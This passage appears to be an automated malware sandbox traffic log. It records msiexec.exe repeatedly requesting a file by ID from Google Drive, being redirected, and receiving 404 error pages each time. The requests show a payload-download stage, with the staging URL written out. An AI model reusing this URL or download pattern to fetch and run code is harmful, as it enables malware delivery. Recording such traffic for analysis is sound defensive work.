                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:04 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQPTa8zBT2xe9uHEQjLnAb87GeTXZm22HVrFb_F8YzM940G9K7iLHQgeJfRBwUIcfEo
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:03 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-eqodYzHgPbVl8OExEnCV-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 35 39 47 6d 50 4b 51 69 48 75 4f 51 31 69 6a 50 76 37 5f 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N59GmPKQiHuOQ1ijPv7_Cw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              64192.168.2.849773216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:05 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:05 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:05 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: script-src 'nonce-7ZJ7HWPaQ_1YqrWfP1AJWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              65192.168.2.849774172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:06 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:06 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC7kqX-fd5fzeS7KSBlWggjeUUW-7UyxGmjDjS--WYVPiOnzfR4jF8D-SdQLRsk--OQN
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:06 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-kYeicar-jivk2dxedxomeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 6b 6d 38 43 72 74 39 48 51 4c 4c 57 6a 41 6b 33 6b 49 49 38 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Xkm8Crt9HQLLWjAk3kII8A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              66192.168.2.849775216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:07 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:07 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:07 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-nrBamg_ECE3uN66YAzQLIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              67192.168.2.849776172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:08 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:08 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC47fJW4dYsaXMBnE0lJ0bde3xkcnqq7dHXwlcullPlaVQRPvSU8jNTWeRMnn4FBM958
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:08 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-g18axqFTU6km4TQ4ooILWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 70 69 44 4b 4a 61 79 68 31 36 42 78 4c 59 54 7a 59 53 59 6f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_piDKJayh16BxLYTzYSYog">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              68192.168.2.849777216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:09 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:09 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:09 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-R8aZS3jT-e9g-xIvd5VpUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              69192.168.2.849778172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:10 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:11 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSfRdy_Jbp2fNRbbCD7NFphQxlphDceFU5Q06zU09coeGYWY82xAYgUm3G7FpG4LH8CShgiMjc
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:10 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-Lb_sSDRAtE5fEM40WWvXfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 6d 64 5f 79 51 70 31 31 5f 33 53 59 4e 6f 36 41 78 70 48 66 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lmd_yQp11_3SYNo6AxpHfA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              70192.168.2.849779216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:11 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:12 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:12 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-gO1BjmGYRXhkgYo7chfo8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
